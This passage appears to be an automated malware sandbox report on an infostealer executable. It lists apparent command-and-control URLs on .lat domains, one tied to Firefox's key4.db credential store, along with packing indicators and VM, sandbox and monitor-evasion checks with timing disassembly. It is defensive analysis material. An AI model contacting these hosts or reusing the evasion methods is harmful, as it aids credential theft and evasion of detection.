                Source: gJkNLYV0ax.exe, 00000000.00000003.2025868617.00000000019C2000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1917456355.00000000019C2000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000002.2085606475.00000000019C2000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998637407.00000000019C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat:443/api5
                Source: gJkNLYV0ax.exe, 00000000.00000003.2025868617.00000000019C2000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000002.2085606475.00000000019C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat:443/apifqs92o4p.default-release/key4.dbPK
                Source: gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: gJkNLYV0ax.exe, 00000000.00000003.1993681289.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995668126.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993011563.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993362306.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995975300.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1992273154.0000000006082000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998731158.0000000006089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXf
                Source: gJkNLYV0ax.exe, 00000000.00000003.1993681289.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995668126.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993011563.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993362306.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995975300.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1992273154.0000000006082000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998731158.0000000006089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvnwP44
                Source: gJkNLYV0ax.exe, 00000000.00000003.1918843535.00000000060E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: gJkNLYV0ax.exe, 00000000.00000003.1965537429.00000000061A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: gJkNLYV0ax.exe, 00000000.00000003.1965537429.00000000061A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: gJkNLYV0ax.exe, 00000000.00000003.1918843535.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1941252262.00000000060D9000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1941148892.00000000060D9000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918935202.00000000060D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: gJkNLYV0ax.exe, 00000000.00000003.1918935202.00000000060B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: gJkNLYV0ax.exe, 00000000.00000003.1918843535.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1941252262.00000000060D9000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1941148892.00000000060D9000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918935202.00000000060D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: gJkNLYV0ax.exe, 00000000.00000003.1918935202.00000000060B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: gJkNLYV0ax.exe, 00000000.00000003.1917456355.00000000019C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sweepyribs.lat:443/api
                Source: gJkNLYV0ax.exe, 00000000.00000003.1993681289.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995668126.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993011563.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993362306.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995975300.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1992273154.0000000006082000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998731158.0000000006089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&r
                Source: gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: gJkNLYV0ax.exe, 00000000.00000003.1965537429.00000000061A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: gJkNLYV0ax.exe, 00000000.00000003.1965537429.00000000061A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: gJkNLYV0ax.exe, 00000000.00000003.1965537429.00000000061A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: gJkNLYV0ax.exe, 00000000.00000003.1965537429.00000000061A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: gJkNLYV0ax.exe, 00000000.00000003.1965537429.00000000061A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49743 version: TLS 1.2

                System Summary

                barindex
                PE file contains section with special chars
                Source: gJkNLYV0ax.exeStatic PE information: section name:
                Source: gJkNLYV0ax.exeStatic PE information: section name: .idata
                Source: gJkNLYV0ax.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeCode function: 0_3_01A586F50_3_01A586F5
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeCode function: 0_3_01A586F50_3_01A586F5
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeCode function: 0_3_01A4B4B50_3_01A4B4B5
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeCode function: 0_3_01A4B3F30_3_01A4B3F3
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeCode function: 0_3_01A586F50_3_01A586F5
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeCode function: 0_3_01A586F50_3_01A586F5
                Source: gJkNLYV0ax.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: gJkNLYV0ax.exeStatic PE information: Section: ZLIB complexity 0.9974248180650684
                Source: gJkNLYV0ax.exeStatic PE information: Section: iyigrnpu ZLIB complexity 0.9949096315298508
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@3/1
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: gJkNLYV0ax.exe, 00000000.00000003.1919012632.0000000006086000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: gJkNLYV0ax.exeVirustotal: Detection: 57%
                Source: gJkNLYV0ax.exeReversingLabs: Detection: 65%
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile read: C:\Users\user\Desktop\gJkNLYV0ax.exeJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: gJkNLYV0ax.exeStatic file information: File size 1880064 > 1048576
                Source: gJkNLYV0ax.exeStatic PE information: Raw size of iyigrnpu is bigger than: 0x100000 < 0x1a2c00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeUnpacked PE file: 0.2.gJkNLYV0ax.exe.e60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iyigrnpu:EW;tggmxbsn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iyigrnpu:EW;tggmxbsn:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: gJkNLYV0ax.exeStatic PE information: real checksum: 0x1d7f0c should be: 0x1d3b96
                Source: gJkNLYV0ax.exeStatic PE information: section name:
                Source: gJkNLYV0ax.exeStatic PE information: section name: .idata
                Source: gJkNLYV0ax.exeStatic PE information: section name:
                Source: gJkNLYV0ax.exeStatic PE information: section name: iyigrnpu
                Source: gJkNLYV0ax.exeStatic PE information: section name: tggmxbsn
                Source: gJkNLYV0ax.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeCode function: 0_3_01A5BAA0 push cs; retf 0_3_01A5BAAA
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeCode function: 0_3_01A5BAA0 push cs; retf 0_3_01A5BAAA
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeCode function: 0_3_01A5CF25 push ss; ret 0_3_01A5CF27
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeCode function: 0_3_01A5CF25 push ss; ret 0_3_01A5CF27
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeCode function: 0_3_019CCC80 push 146FB1CCh; ret 0_3_019CCC85
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeCode function: 0_3_019CCD14 pushad ; retf 0_3_019CCD15
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeCode function: 0_3_019CC10C pushad ; retf 0_3_019CC10D
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeCode function: 0_3_019CC078 push 336FB1CCh; ret 0_3_019CC07D
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeCode function: 0_3_01A4E7A6 pushad ; retf 0_3_01A4E7B5
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeCode function: 0_3_01A4E8E4 pushad ; retf 0_3_01A4E8E5
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeCode function: 0_3_01A4EED4 pushad ; retf 0_3_01A4EED5
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeCode function: 0_3_01A5BAA0 push cs; retf 0_3_01A5BAAA
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeCode function: 0_3_01A5BAA0 push cs; retf 0_3_01A5BAAA
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeCode function: 0_3_01A5CF25 push ss; ret 0_3_01A5CF27
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeCode function: 0_3_01A5CF25 push ss; ret 0_3_01A5CF27
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeCode function: 0_3_019F7ABD pushad ; ret 0_3_019F7C75
                Source: gJkNLYV0ax.exeStatic PE information: section name: entropy: 7.981691303814376
                Source: gJkNLYV0ax.exeStatic PE information: section name: iyigrnpu entropy: 7.954353188539169

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: EB83AB second address: EB83B5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6644F246ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: EB83B5 second address: EB7C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 cld 0x0000000a push dword ptr [ebp+122D11F9h] 0x00000010 pushad 0x00000011 mov dword ptr [ebp+122D2DC3h], edi 0x00000017 js 00007F664452DADCh 0x0000001d add ebx, dword ptr [ebp+122D2ACEh] 0x00000023 popad 0x00000024 call dword ptr [ebp+122D1CADh] 0x0000002a pushad 0x0000002b cmc 0x0000002c xor eax, eax 0x0000002e pushad 0x0000002f mov di, 7EDBh 0x00000033 mov dword ptr [ebp+122D25D1h], ecx 0x00000039 popad 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e sub dword ptr [ebp+122D25D1h], edi 0x00000044 mov dword ptr [ebp+122D2CF2h], eax 0x0000004a jns 00007F664452DADCh 0x00000050 mov esi, 0000003Ch 0x00000055 jmp 00007F664452DADAh 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e clc 0x0000005f sub dword ptr [ebp+122D1A0Ah], esi 0x00000065 lodsw 0x00000067 stc 0x00000068 pushad 0x00000069 or ebx, dword ptr [ebp+122D2A82h] 0x0000006f jmp 00007F664452DAE4h 0x00000074 popad 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 jmp 00007F664452DADFh 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 mov dword ptr [ebp+122D25D1h], eax 0x00000088 stc 0x00000089 push eax 0x0000008a push eax 0x0000008b push edx 0x0000008c je 00007F664452DAD8h 0x00000092 push ebx 0x00000093 pop ebx 0x00000094 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 103C7F7 second address: 103C80C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 103C80C second address: 103C814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 103C814 second address: 103C819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 103C819 second address: 103C81F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 103C81F second address: 103C823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 103C959 second address: 103C972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F664452DAE1h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 103C972 second address: 103C97C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 103C97C second address: 103C98A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jne 00007F664452DAD6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1040681 second address: 104071A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F6644F246F6h 0x0000000b jmp 00007F6644F246EAh 0x00000010 popad 0x00000011 popad 0x00000012 add dword ptr [esp], 6916AC14h 0x00000019 call 00007F6644F246EFh 0x0000001e mov dword ptr [ebp+122D25F4h], ecx 0x00000024 pop ecx 0x00000025 and si, 13FFh 0x0000002a push 00000003h 0x0000002c or edi, 21C40088h 0x00000032 mov edi, dword ptr [ebp+122D2B8Ah] 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push edi 0x0000003d call 00007F6644F246E8h 0x00000042 pop edi 0x00000043 mov dword ptr [esp+04h], edi 0x00000047 add dword ptr [esp+04h], 00000014h 0x0000004f inc edi 0x00000050 push edi 0x00000051 ret 0x00000052 pop edi 0x00000053 ret 0x00000054 sub dword ptr [ebp+122DB572h], edi 0x0000005a push 00000003h 0x0000005c jne 00007F6644F246E6h 0x00000062 call 00007F6644F246E9h 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007F6644F246EAh 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 104071A second address: 1040733 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F664452DAE5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1040733 second address: 104079A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6644F246E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jp 00007F6644F2470Fh 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jc 00007F6644F246F2h 0x0000001d jp 00007F6644F246ECh 0x00000023 mov eax, dword ptr [eax] 0x00000025 push eax 0x00000026 jp 00007F6644F246E8h 0x0000002c pop eax 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 push ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 push edx 0x00000035 pop edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 104079A second address: 10407CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 and cx, 76DBh 0x0000000d lea ebx, dword ptr [ebp+1245C50Dh] 0x00000013 mov edx, esi 0x00000015 xchg eax, ebx 0x00000016 push edi 0x00000017 je 00007F664452DAD8h 0x0000001d pushad 0x0000001e popad 0x0000001f pop edi 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F664452DAE0h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10407CD second address: 10407D7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6644F246ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
